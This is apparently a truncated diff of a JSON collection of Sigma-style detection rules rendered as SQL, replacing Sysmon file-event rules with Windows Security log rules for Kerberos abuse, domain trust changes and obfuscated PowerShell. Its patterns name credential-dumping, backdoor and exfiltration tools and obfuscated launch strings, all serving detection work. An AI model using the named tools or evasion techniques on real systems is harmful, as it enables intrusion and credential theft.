"Unknown" + "Unknown (data set is too small; further testing needed)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\unattend.xml' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'WMI Namespace' AND ObjectName LIKE '%subscription%' ESCAPE '\\')" ], - "filename": "file_event_win_access_susp_unattend_xml.yml" + "filename": "win_security_wmi_persistence.yml" }, { - "title": "Suspicious Scheduled Task Write to System32 Tasks", - "id": "80e1f67a-4596-4351-98f5-a9c3efabac95", - "status": "test", - "description": "Detects the creation of tasks from processes executed from suspicious locations", - "author": "Florian Roth (Nextron Systems)", + "title": "Addition of Domain Trusts", + "id": "0255a820-e564-4e40-af2b-6ac61160335c", + "status": "stable", + "description": "Addition of domains is seldom and should be verified for legitimacy.", + "author": "Thomas Patzke", "tags": [ "attack.persistence", - "attack.execution", - "attack.t1053" + "attack.t1098" ], "falsepositives": [ - "Unknown" + "Legitimate extension of domain structure" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Windows\\\\System32\\\\Tasks%' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\config\\\\systemprofile%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4706')" ], - "filename": "file_event_win_susp_task_write.yml" + "filename": "win_security_susp_add_domain_trust.yml" }, { - "title": "EVTX Created In Uncommon Location", - "id": "65236ec7-ace0-4f0c-82fd-737b04fd4dcb", + "title": "DiagTrackEoP Default Login Username", + "id": "2111118f-7e46-4fc8-974a-59fd8ec95196", "status": "experimental", - "description": "Detects the creation of new files with the \".evtx\" extension in non-common locations. Which could indicate tampering with default evtx locations in order to evade security controls", - "author": "D3F7A5105", + "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.privilege_escalation" ], "falsepositives": [ - "Admin activity", - "Backup activity" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%.evtx' ESCAPE '\\' AND NOT ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Containers\\\\BaseImages\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\dllhost.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND TargetOutboundUserName = 'thisisnotvaliduser')" ], - "filename": "file_event_win_create_evtx_non_common_locations.yml" + "filename": "win_security_diagtrack_eop_default_login_username.yml" }, { - "title": "Inveigh Execution Artefacts", - "id": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", + "title": "Win Susp Computer Name Containing Samtheadmin", + "id": "39698b3f-da92-4bc6-bfb5-645a98386e45", "status": "experimental", - "description": "Detects the presence and execution of Inveigh via dropped artefacts", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", + "author": "elhoim", "tags": [ - "attack.command_and_control", - "attack.t1219" + "cve.2021.42278", + "cve.2021.42287", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1078" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\Inveigh-Log.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Cleartext.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-FormInput.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Relay.ps1' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((SamAccountName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND SamAccountName LIKE '%$' ESCAPE '\\') OR (TargetUserName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_hktl_inveigh_artefacts.yml" + "filename": "win_security_susp_computer_name.yml" }, { - "title": "Suspicious Double Extension Files", - "id": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", + "title": "Invoke-Obfuscation Via Use MSHTA - Security", + "id": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", "status": "experimental", - "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036.007" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) OR (TargetFilename LIKE '%.zip.exe' ESCAPE '\\' OR TargetFilename LIKE '%.rar.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%mshta%' ESCAPE '\\' AND ServiceFileName LIKE '%vbscript:createobject%' ESCAPE '\\' AND ServiceFileName LIKE '%.run%' ESCAPE '\\' AND ServiceFileName LIKE '%window.close%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_double_extension.yml" + "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml" }, { - "title": "Suspicious Creation TXT File in User Desktop", - "id": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", + "title": "Register new Logon Process by Rubeus", + "id": "12e6d621-194f-4f59-90cc-1959e21e69f7", "status": "test", - "description": "Ransomware create txt file in the user Desktop", - "author": "frack113", + "description": "Detects potential use of Rubeus via registered new trusted logon process", + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", "tags": [ - "attack.impact", - "attack.t1486" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.txt' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4611' AND LogonProcessName = 'User32LogonProcesss')" ], - "filename": "file_event_win_susp_desktop_txt.yml" + "filename": "win_security_register_new_logon_process_by_rubeus.yml" }, { - "title": "Startup Folder File Write", - "id": "2aa0a6b4-a865-495b-ab51-c28249537b75", - "status": "test", - "description": "A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Invoke-Obfuscation RUNDLL LAUNCHER - Security", + "id": "f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca", + "status": "experimental", + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp%' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%rundll32.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\')" ], - "filename": "file_event_win_startup_folder_file_write.yml" + "filename": "win_security_invoke_obfuscation_via_rundll_services_security.yml" }, { - "title": "CVE-2022-24527 Microsoft Connected Cache LPE", - "id": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", + "title": "ISO Image Mount", + "id": "0248a7bc-8a9a-4cd8-a57e-3ae8e073a073", "status": "experimental", - "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the mount of ISO images on an endpoint", + "author": "Syed Hasan (@syedhasan009)", "tags": [ - "attack.privilege_escalation", - "attack.t1059.001", - "cve.2022.24527" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unknown" + "Software installation ISO files" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%WindowsPowerShell\\\\Modules\\\\webAdministration\\\\webAdministration.psm1' ESCAPE '\\' AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND ObjectServer = 'Security' AND ObjectType = 'File' AND ObjectName LIKE '\\\\Device\\\\CdRom%' ESCAPE '\\') AND NOT (ObjectName LIKE '\\\\Device\\\\CdRom0\\\\setup.exe' ESCAPE '\\'))" ], - "filename": "file_event_win_cve_2022_24527_lpe.yml" + "filename": "win_security_iso_mount.yml" }, { - "title": "Creation Exe for Service with Unquoted Path", - "id": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", - "status": "test", - "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", - "author": "frack113", + "title": "Invoke-Obfuscation Via Use Rundll32 - Security", + "id": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.009" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\program.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ServiceFileName LIKE '%value%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%comspec%' ESCAPE '\\' OR ServiceFileName LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "file_event_win_creation_unquoted_service_path.yml" + "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" }, { - "title": "Adwind RAT / JRAT File Artifact", - "id": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", + "title": "Remote WMI ActiveScriptEventConsumers", + "id": "9599c180-e3a8-4743-8f92-7fb96d3be648", "status": "test", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.003" + ], + "falsepositives": [ + "SCCM" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Oracle\\\\bin\\\\java%' ESCAPE '\\' AND TargetFilename LIKE '%.exe%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Retrive%' ESCAPE '\\' AND TargetFilename LIKE '%.vbs%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4624' AND LogonType = '3' AND ProcessName LIKE '%scrcons.exe' ESCAPE '\\') AND NOT (TargetLogonId = '0x3e7'))" ], - "filename": "file_event_win_mal_adwind.yml" + "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml" }, { - "title": "QuarksPwDump Dump File", - "id": "847def9e-924d-4e90-b7c4-5f581395a2b4", - "status": "test", - "description": "Detects a dump file written by QuarksPwDump password dumper", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - Security", + "id": "fd0f5778-d3cb-4c9a-9695-66759d04702a", + "status": "experimental", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM-%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ServiceFileName REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ServiceFileName REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ServiceFileName REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ServiceFileName REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ServiceFileName REGEXP '\\$VerbosePreference\\.ToString\\(' OR ServiceFileName REGEXP '\\String\\]\\s*\\$VerbosePreference'))" ], - "filename": "file_event_win_hktl_quarkspw_filedump.yml" + "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" }, { - "title": "APT29 2018 Phishing Campaign File Indicators", - "id": "3a3f81ca-652c-482b-adeb-b1c804727f74", - "status": "stable", - "description": "Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant", - "author": "@41thexplorer", + "title": "Suspicious Kerberos RC4 Ticket Encryption", + "id": "496a0e47-0a33-4dca-b009-9e6ca3591f39", + "status": "experimental", + "description": "Detects service ticket requests using RC4 encryption type", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1218.011" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ - "Unlikely" + "Service accounts used on legacy systems (e.g. NetApp)", + "Windows Domains with DFL 2003 and legacy systems" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%ds7002.lnk%' ESCAPE '\\' OR TargetFilename LIKE '%ds7002.pdf%' ESCAPE '\\' OR TargetFilename LIKE '%ds7002.zip%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4769' AND TicketOptions = '0x40810000' AND TicketEncryptionType = '0x17') AND NOT (ServiceName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_apt_cozy_bear_phishing_campaign_indicators.yml" + "filename": "win_security_susp_rc4_kerberos.yml" }, { - "title": "Malicious PowerShell Scripts - FileCreation", - "id": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", - "status": "test", - "description": "Detects the creation of known offensive powershell scripts used for exploitation", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein", + "title": "Password Change on Directory Service Restore Mode (DSRM) Account", + "id": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", + "status": "stable", + "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.", + "author": "Thomas Patzke", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Unknown" + "Initial installation of a domain controller" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Add-ConstrainedDelegationBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RemoteRegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-ScrnSaveBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Check-VM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ConvertTo-ROT13.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Copy-VSS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Create-MultipleSessions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DNS\\_TXT\\_Pwnage.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Do-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DomainPasswordSpray.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download\\_Execute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download-Execute-PS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enabled-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enable-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-Command-MSSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-DNSTXT-Code.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-OnTime.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ExetoText.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Exploit-Jboss.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-AVSignature.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-Fruit.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-GPOLocation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-TrustedDocuments.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireBuster.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireListener.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ApplicationHost.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ChromeDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ClipboardContents.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ComputerDetail.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-FoxDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPAutologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-IndexedItem.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Keystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-LSASecret.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-MicrophoneAudio.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHashes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHints.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAlwaysInstallElevated.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAutoLogon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RickAstley.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Screenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SecurityPackages.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceFilePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServicePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceUnquoted.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SiteListPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-System.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-TimedScreenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-UnattendedInstallFile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Unconstrained.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-USBKeystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VaultCredential.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnAutoRun.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnSchTask.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebConfig.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebCredentials.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WLAN-Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Gupt-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Login.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-ServiceBinary.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-SSP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ACLScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ADSBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-AmsiBypass.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ARPScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BackdoorLNK.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BadPotato.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BetterSafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BruteForce.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Carbuncle.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Certify.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ConPtyShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialsPhish.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DAFT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DCSync.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Decode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DinvokeKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DllInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DowngradeAccount.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EgressCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Encode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EventViewer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Eyewitness.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-FakeLogonScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Farmer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Get-RBCD-Threaded.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Gopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper2.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper3.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-HandleKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Interceptor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Internalmonologue.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-InveighRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRegsvr.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRundll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelayUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-LdapSignCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Lockless.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MalSCCM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MimikatzWDigestDowngrade.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikittenz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MITM6.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NanoDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetRipper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetworkRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NinjaCopy.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-OxidResolver.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshellx86.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Paranoia.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PortScan.ps1' 